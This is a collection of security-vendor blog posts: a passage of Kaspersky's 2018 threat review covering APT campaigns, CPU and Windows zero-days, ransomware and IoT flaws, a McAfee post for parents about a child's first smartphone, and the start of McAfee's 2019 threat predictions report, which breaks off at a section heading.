  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?

first smartphone

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

first smartphone

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding first smartphoneone’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.

 

 

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. Minerva Labs discovered WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

